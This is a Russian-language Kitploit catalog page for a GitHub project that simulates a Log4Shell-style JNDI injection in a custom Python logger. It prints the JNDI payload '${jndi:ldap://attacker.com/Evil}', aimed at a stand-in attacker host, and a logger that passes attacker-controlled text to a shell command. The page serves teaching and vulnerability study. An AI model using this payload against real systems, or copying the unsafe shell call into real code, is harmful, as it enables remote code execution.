Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-21011-Log4j-style-JNDI-Injection-in-Custom-Logger-Simulated- — Симулирует CVE-2026-21011 — JNDI-инъекцию в стиле Log4j в кастомном логгере: разбирает шаблоны ${jndi:...} и демонстрирует удалённое выполнение кода, инициируемое через LDAP. | Kitploit
Инструменты/GitHubGitHub/george0papasotiriou/cve-2026-21011-log4j-style-jndi-injection-in-custom-logger-simulated-
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и Образование
GitHubgeorge0papasotiriou/cve-2026-21011-log4j-style-jndi-injection-in-custom-logger-simulated-

CVE-2026-21011-Log4j-style-JNDI-Injection-in-Custom-Logger-Simulated-

Симулирует CVE-2026-21011 — JNDI-инъекцию в стиле Log4j в кастомном логгере: разбирает шаблоны ${jndi:...} и демонстрирует удалённое выполнение кода, инициируемое через LDAP.

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
17 дней назадЕщё не проверено

CVE-2026-21011 – JNDI-инъекция в стиле Log4j в пользовательском логгере (имитация)

Программный код (имитация Java на Python)

root@kitploit:~
# log4j_sim.py - Custom logger that evaluates ${...} patterns
import subprocess, re

def log(message):
    # Vulnerable: looks up JNDI-like syntax and executes
    pattern = r'\$\{jndi:(.+?)\}'
    for match in re.finditer(pattern, message):
        lookup = match.group(1)
        if lookup.startswith('ldap://'):
            # Simulate connecting to LDAP and loading a class
            print(f"Loading malicious class from {lookup}")
            subprocess.run(f"echo 'CLASS LOADED: {lookup}'", shell=True)  # just demo

log("User-Agent: ${jndi:ldap://attacker.com/Evil}")

CVE-2026-21011 – JNDI-инъекция через пользовательский логгер

Severity: Critical

Обзор

Пользовательская структура логирования анализирует шаблоны ${jndi:...} в сообщениях журнала, как в печально известной уязвимости Log4Shell. Атакующий может внедрить JNDI-запрос для загрузки и выполнения произвольного кода с удалённого сервера.

Сведения об уязвимости

  • Тип: инъекция кода / JNDI-инъекция
  • Воздействие: удалённое выполнение кода.
  • Корневая причина: логгер анализирует данные, управляемые пользователем, и выполняет динамические запросы на основе содержимого.

Демонстрация эксплуатации

Запустите имитацию:

root@kitploit:~
python log4j_sim.py

Скрипт выводит сообщение о том, что он загрузит класс с LDAP-сервера атакующего.

Скачать инструмент